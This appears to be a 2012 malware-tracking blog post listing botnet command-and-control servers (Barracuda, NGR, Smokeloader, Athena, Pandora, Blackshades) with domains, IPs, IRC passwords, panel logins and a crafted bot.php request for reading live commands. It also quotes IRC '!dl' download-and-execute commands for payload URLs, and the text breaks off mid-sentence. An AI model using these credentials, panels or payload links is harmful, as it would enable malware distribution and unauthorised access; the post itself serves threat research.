Month: November 2012

Multiple Barracuda http nets (hosted by Russian Federation Moscow Pallada Web Service Llc)


URLs are: r00kiehttp.no-ip.info, rabbit801.no-ip.org, drhawks.no-ip.org, pooostealer.no-ip.org
To see what command is currently being sent, just add this to the end of the domain: /bot.php?ip=0.0.0.0&os=Microsoft%20Windows%20xp&name=FBI-PC&id=Federal-Agent-1.3.3.7
The command will show up in plain text on the page.
Hosting infos: http://whois.domaintools.com/37.0.123.113
One other on different hosting: watchshopper.no-ip.org/backup/
Hosting infos: http://whois.domaintools.com/91.217.178.192

aminakoyim.co.cc (ngr irc botnet hosted by Sweden Stockholm Portlane Networks Ab)


Resolved aminakoyim.co.cc to 46.246.93.77
Server: aminakoyim.co.cc
Port: 6667
Password: timu
Channel: #NGR
* Topic for #NGR is: !vs www.pvpserver.gen.tr 1 | !dl hxxp://www.depac.ws/jar/h.exe
* Topic for #NGR set by infeCTeD at Sun Nov 04 13:32:54 2012
All users are auto joined to #debug# on connect
* Topic for #debug# is: !dl hxxp://www.depac.ws/jar/t.exe c:/t.exe 1

cdn.barracudasec.com (Barracuda http bot hosted by Seychelles Victoria Business Dialogue Ltd)


Resolved cdn.barracudasec.com to 91.217.178.192
Server: cdn.barracudasec.com
Gate file: /bot.php
http://cdn.barracudasec.com/images/logo.png
Bot GET requests look like this: /bot.php?ip=0.0.0.0&os=Microsoft Windows xp&name=FBI-PC&id=Federal agent-barracuda version
Bots will get their IP from checkip.dyndns.com or api.wipmania.com
Hint: $ip = $REMOTE_ADDR
Hosting infos: http://whois.domaintools.com/91.217.178.192
Another panel is located at xn--y0h.co.cc. This one is on a different host.
http://xn--y0h.co.cc/images/logo.png
Hosting infos: http://whois.domaintools.com/37.0.124.66

diablothreecracked.in (Smokeloader hosted by Luxembourg Luxembourg Root Sa)


Resolved diablothreecracked.in to 94.242.199.145
Zain got himself a new Smokeloader.
Server: diablothreecracked.in
Gate file: /index.php
He left the zip containing the panel and original exe up on the host: hxxp://diablothreecracked.in/smoke.zip
Here it is if he notices and takes it down
hxxp://diablothreecracked.in/install.php is still up as well.
Hosting infos: http://whois.domaintools.com/94.242.199.145

5.231.22.188 (Athena bot hosted in Germany Bad Homburg Vor Der Hohe Ghostnet Network Used For Vps Hosting Services)


Sample comes from djmetral, thnx to him
Server: 5.231.22.188:6667
Nickname: [A|W_XP|2]cznug
Username: 18129
Channel: (Password: )
Executable is binded with other bot on the same server
Nick: hAtbLaDe
Username: 27867
Channel: #Support
Channel: #Lobby,#IRCd
Channel: #l34k
Channel: #IRCd,#Support,#main with Password letmein,somepass,anotherpass
Private Message to User VHOST: "VHOST"
#army is the channel for ddos bots (pBots) here the

mirror.serverhalflife.com (Pandora http bot hosted by Netherlands Haarlem Leaseweb B.v.)


Resolved mirror.serverhalflife.com to 95.211.209.178
Pandora ddos bot
Server: mirror.serverhalflife.com
Gate file: /pando/?u=17b6n82405v5ycal3ks4bb7i655e088m
Other crap on the server
Microworm panel: mirror.serverhalflife.com/micro/ The password is “root”
Files are located at hxxp://mirror.serverhalflife.com/files/
blackdra.exe is blackshades
Connects to own3d-private.no-ip.org:4010
Blackshades downloads more of the files
x0x0.294.24.10.10.0.2.15.0.0.0.Federal-Agent.FBI-PC.1.Microsoft Windows XP .522.0.5.0.58802054.0.new.November 4, 2012.Hide My Ass Vpn
FBI access panel (Welcome Agent